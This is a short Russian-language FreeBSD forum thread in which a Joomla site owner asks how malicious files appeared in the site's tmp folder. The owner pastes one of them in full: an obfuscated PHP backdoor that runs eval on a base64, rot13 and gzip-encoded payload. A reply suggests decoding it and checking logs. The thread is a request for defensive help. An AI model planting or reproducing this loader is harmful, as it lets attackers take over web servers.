BSDPORTAL.RU

На этом сайте обсуждаются вопросы использования ОС FreeBSD
 Портал  •  Статьи  •  Форум  •  Wiki  •  Поиск  •  FAQ  •  Обои  •   Официальная документация  •  Новые темы 

Часовой пояс: UTC + 4 часа




Начать новую тему Ответить на тему  [ Сообщений: 2 ] 
Автор Сообщение
 Заголовок сообщения: Joomla Вирус в папке tmp!
СообщениеДобавлено: Пт 26 июн, 2015 3:02 pm 
Не в сети
Аватара пользователя

Зарегистрирован: Вт 07 май, 2013 8:43 pm
Сообщения: 741
Откуда: Украина
Есть сайт на Joomla 2.5.28. Вчера заметил, что в папке tmp появились файлы типа: 20150623063130libs.php.vob со следующим содержанием:
Код:
<?php
set_time_limit(0);
error_reporting(0);

eval(gzinflate(str_rot13(base64_decode('vUl6QuNTEP5cJP7Dso3kUQcJL089AU6ExIHo8tbYdoUATI69VvbiN63XYyniv2pzeifxZGNDnRohkew8z8wz45kdMyFPbgkWhU/yYEner5xhYvEpKe/wOHOyXLIM3TA6g/6tNrG/2gvtvkX57XZ7q/TAcC6dMAkkqZN9IJUe2QS+Im70lz66pdemObSuB4ZW79HMg68F81X/ZqwbpjUeaEXAJGeXgKCmLXNZEpdY5icLOyBqAfpTBxRksT1y/r7LAHvBA2EBuKzhoeWHLtNJCayAFfJHipmTCC6X4N91tGirN3Xp4GDQYdPT5+0t5sXsDUcfQCo0ExETaIg4D3A5TAa2z8qrlLT0v9V1tVNDpyx2tpChACevkVNtYmDqGyTf5l6ZLpLAVoLZ8eHxxdKeh27VCX26WKgqE92l12nMPWWJzwRXNJcyOqnV8jpOxfJH7oLOkBhZPDAUkXJjFxA47YA4B8TBZK6TrgVZE8/z7RlqDv+4mOHR/6jgctcB8wAM61T1AvHpk21TfE3OO/dXN2I1xwsDhl2LWhuHiWPYcxt3U2bUGZpJu9PV+42erqlJZ0wsOamvRK1OZtzT+6Y1GgxZ7b5XeEiPQuJ3NI+wJwVYH3fqf5ekDiqp4F/YsCfYsOSyIfq6+HbfArhfwDrzkNAzyaXHztPzs03663kiztV5uba0FwlB4WPwtz7SW+TyhrTH3WGvZNV2kuag1xv3O+bNBvgQ0YLZMLxGweI5kW7oxcS41rtdg7TNIXYOG329WFOtIek1oM6jDfYRsptuIHpUkobr84Dc9ED6l2S/Oe5fTvsjOJM+BRyJ+T+sflWc0IO+mWsJqj+n1cxflZ7VJqt8XuUJ5hZ1h+/kvYhq9EHi75/VJ+Pmz6tVLsGhlcB81HaZSaFYLDiA1pLqsFyp0sp7cIyBAEhZuFtKnvwlfAUPqxBIV3N44+x741RmGnD/UECKE24ldxoqUjdGuNAkDwMSPU8wguPoPLrpxejgRDq8paQeWCGiMC6jfUqrdndplXYHeh4LlKmyaoAGwXEiAoInSADnRvG0ZK4uhuz8VCHu7j4SA9CvB8kCbsk0KJnwiY/3PkdtiJuQ2KoGaFfP3y51M/R9O2PzAp7xIFckkcuI1alx3yQlS+M6aHyXFq1TMvH52p76oeTBhtbF3wvA10PZuWlNR8rgASkXfuJWHtlPKtweaW2uPEIHs/lWCuPIC3qXtLnHRxo1Ub/Ic85dlwWZ2jjVXgBZgZ+ZsTfxJ81vfkG9vamizx4V+4R5itjwj9VZ2QfHTJyAPeIXVxzPjuO6tAuER3FzoxO5qnqaY6G8G9sIK2mrpeR8HyWK4WVcjNFtBmlXV1TOyeQA6VYZ1P7ChXLcd2xWtHvAKZDqUD98YEnqnbkWAso/pFU/skUaLK2VmqoKk4n5Ja4w2/QeybsCXiiYi/fCM1aXGCnYjcRkSxzDMoE75XtqY2yl9h1PQsmzGrkXlc46Py81DIqqW3P0XbXps7stEnmzjY7yNtpKH7ix4znzPIt9cEEZPamrLe2kGmV24X4pvn/4eAlupm56+K8Swjc1rIr5Ia8aee09z9ZeZPzy1cqdrDMLppAZtoKl9hawbmLFsMaqtfQPIXyWCBtiEfXeR8mTSmcM8i8=')))); ?>



Как от появился этот вирус в этой папке. Что делать, чтобы запретить его появление в будущем?
Спасибо за ответ!

_________________
FreeBSD A9t 11.0-RC2 FreeBSD 11.0-RC2 #0 r304729: Wed Aug 24 08:46:45 UTC 2016 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC i386


Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Joomla Вирус в папке tmp!
СообщениеДобавлено: Пт 26 июн, 2015 4:54 pm 
Не в сети

Зарегистрирован: Пт 03 сен, 2004 1:26 pm
Сообщения: 2201
ищите дыры в php и неудачном коде, читайте про security php и php-code.

декодируйте код который у Вас и проанализируйте:

http://ddecode.com/phpdecoder/

остальное смотрите по логам.


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 2 ] 

Часовой пояс: UTC + 4 часа


Кто сейчас на конференции

Зарегистрированные пользователи: Bing [Bot], Google [Bot]


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB
Яндекс.Метрика